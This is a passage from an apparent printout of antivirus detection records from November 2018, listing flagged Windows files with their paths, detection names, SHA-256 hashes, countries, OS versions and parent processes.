  Row(detection=Row(filename='avscan-20181104-202849-7199f858', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bc7243c7\\AVSCAN-20181104-202837-6FD23B41\\AVSCAN-20181104-202849-7199F858', filesize=1536000, name='TR/Dropper.Gen.#M1.#R1'), hash='fa27dc0aa4ce63e95f65ec478f4dc33437b2b25e63e12968539ad6ae053765ad', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T18:28:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181101-075943-07f6b62a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6485ed3c\\AVSCAN-20181101-075913-048B6E52\\AVSCAN-20181101-075943-07F6B62A', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='fe338852318a1a17e233f197095e502a5bfcf013d3170ba8aba2fecec0115dd9', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:59:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msvcrmtk.dll', filepath='E:\\PACM00_11_A.11_180410_a7d06fc5\\刷机工具\\刷机工具\\刷机工具\\msvcrmtk.dll', filesize=192000, name='TR/Black.Gen2.#M300.#R100338'), hash='fff0bae1269aaf7bf1db339362c218ba9a2a9512b06a583eb281fd59858bead7', metadata=Row(cmdline='\\\\\\/elevated \\\\\\/regrun', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Tencent\\QQPCMgr\\12.14.19590.218\\QQPCTray.exe', parentsize=357752, timestamp='2018-11-01T14:44:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-015716-0773cfc6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d23a290a\\AVSCAN-20181101-015618-FC4F1F9B\\AVSCAN-20181101-015716-0773CFC6', filesize=2496000, name='HEUR/AGEN.1024324.#M1.#R1'), hash='ffee224f9f3581b42774a9280783e15853f4375110eb991c9d5f3c976456bac1', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T00:57:18Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp6420073\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T10:36:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='chiaotzu.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Chiaotzu\\Chiaotzu.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24cc76317362660a7ca0b1203fcb10e4d9b4e230f77b6fcc345f49025aa26829', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-163410-142fe4c9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_731bb7c6\\AVSCAN-20181102-163401-1297175E\\AVSCAN-20181102-163410-142FE4C9', filesize=256000, name='TR/Agent.256000.C.#M1.#R1'), hash='185c137566c02057db28f1eef903b17754be7f63a38d74984dae684e62bf79c0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:34:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp4090412\\MNNStubSetup.exe', filesize=576000, name='Adware/DealPly.halkg.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\/RSF \\/ppn:YyhwYgxaFRAiP211FM5W \\/mnl', country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\thehat_2706534182.exe', parentsize=2488913, timestamp='2018-11-02T17:59:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:31:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-02T15:15:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='babylon 8.x.x.x universal_patch_under seh team.exe', filepath='\\\\?\\F:\\ANDREAS\\ALT\\DATEN\\Software\\Babylon\\Babylon 8.x.x.x Universal_Patch_Under SEH Team.exe', filesize=128000, name='TR/Crypt.XPACK.Gen5.#M300.#R400233'), hash='32c35516d22bd9ccd46f86c7ca582119b8e4e41920197d554912e2994f58bc4c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T10:28:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='powerdata.exe', filepath='H:\\HBCD\\Programs\\POWERDATA.EXE', filesize=64000, name='TR/Siggen.64000.3.#M1.#R1'), hash='55ef4bb343cacd348db91d63b011d0d8004df3db4cf79d0abbfefbe248e9491c', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T22:11:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T22:30:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-235333-60e6b949', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-235257-5CC05747\\AVSCAN-20181102-235333-60E6B949', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:53:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='etabs_2015.exe', filepath='C:\\Users\\X\\Downloads\\download\\CSI ETABS 2015 version 15.0.0.1221 [32-64 Bit] - [FirstUploads]\\32-Bit\\License Generator\\etabs_2015.exe', filesize=1152000, name='TR/Black.Gen2.#M300.#R100338'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe10_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe10 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:55:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T04:32:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pmlkmk.exe', filepath='D:\\DOKUMENKU\\PMLKMK\\PMLKMK.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:47:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tch9_pipewire18.dll', filepath='C:\\Tangent\\TArch2014\\sys18\\tch9_Pipewire18.dll', filesize=1536000, name='W32/Ramnit.CD.#M1.#R1'), hash='6877dc68ae5b877d43028ed61e92cd2c0f069423efb21ca08c43b77bedfb4767', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=677024, timestamp='2018-11-02T08:01:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-235848-85790d9e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-235823-828AA38D\\AVSCAN-20181102-235848-85790D9E', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:58:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='57f90f2381f560685af89eabc0d76010a61d896b61bd5f7b5bd0e6c2df619e02', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\57F90F2381F560685AF89EABC0D76010A61D896B61BD5F7B5BD0E6C2DF619E02', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='57f90f2381f560685af89eabc0d76010a61d896b61bd5f7b5bd0e6c2df619e02', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:04:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='txd.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\TXD\\TXD.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='39937865052cb558fe82b0851e6c2a2d094007dd9fdbbd4904c79cca4a4d95a6', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155808-e12b8d2b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155808-E12B8D2B', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:58:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fxc_proxyprocess.exe', filepath='\\\\?\\C:\\Program Files\\Foxit Software\\Foxit Reader\\plugins\\Creator\\FXC_ProxyProcess.exe', filesize=140000, name='W32/Sality.AT.#M1.#R1'), hash='56a407df12fe080a9aa79631cdde0c3e2c84f18daece8a1c02f283a127352678', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:07:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-210125-3857b43e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1a62562e\\AVSCAN-20181102-205937-2A75F477\\AVSCAN-20181102-210125-3857B43E', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:01:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:50:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0127090.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0127090.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-125055-9df473d1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3bb6bd9b\\AVSCAN-20181102-125040-9AEE7B84\\AVSCAN-20181102-125055-9DF473D1', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:50:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:28:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:19:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:14:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='46a5d04eae4c913cb86e4486dd015feed077ea2786aa209503d1cd6275579461', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\46A5D04EAE4C913CB86E4486DD015FEED077EA2786AA209503D1CD6275579461', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='46a5d04eae4c913cb86e4486dd015feed077ea2786aa209503d1cd6275579461', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:03:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:09:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:17:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-191452-2f32c9b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_79e0e1d8\\AVSCAN-20181102-191417-289EF3A6\\AVSCAN-20181102-191452-2F32C9B6', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:16:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='12e35f3749419fec3510cfd26ed2a8fed4d5314b32040284d82d8186b9375420', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-29\\12E35F3749419FEC3510CFD26ED2A8FED4D5314B32040284D82D8186B9375420', filesize=1856000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='12e35f3749419fec3510cfd26ed2a8fed4d5314b32040284d82d8186b9375420', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:22:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-001514-bec08ac7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_267b6185\\AVSCAN-20181102-235252-420EE3D5\\AVSCAN-20181103-001514-BEC08AC7', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:15:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T10:55:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wab.exe', filepath='E:\\WINDOWS\\$NtServicePackUninstall$\\wab.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='014d681f318edb59f382a127c9c252588c7e6213e544ec176752c576e57a64d5', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vussxhbf.exe', filepath='f:\\recycler\\s-7-5-57-0134166447-0306465866-823005636-0523\\vUSSxhbf.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='D:\\# Andromeda Backup\\2018-10\\Downloads\\Setup\\msimg32.dll', filesize=5696000, name='TR/CoinLoader.JY.#M1.#R1'), hash='517be7d335a0593e425740975aacd37de9dd347a705a6862ce20b2e03ffe9622', metadata=Row(cmdline='\\\\\\/systemstart \\\\\\/autostart \\\\\\/adminuser', country='AU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\IObit\\IObit Malware Fighter\\IMF.exe', parentsize=5608208, timestamp='2018-11-02T22:06:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055236-787d61dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055236-787D61DD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054632-9f8e0215', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054632-9F8E0215', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:31Z'), dt=datetime.date(2018, 11, 2)),
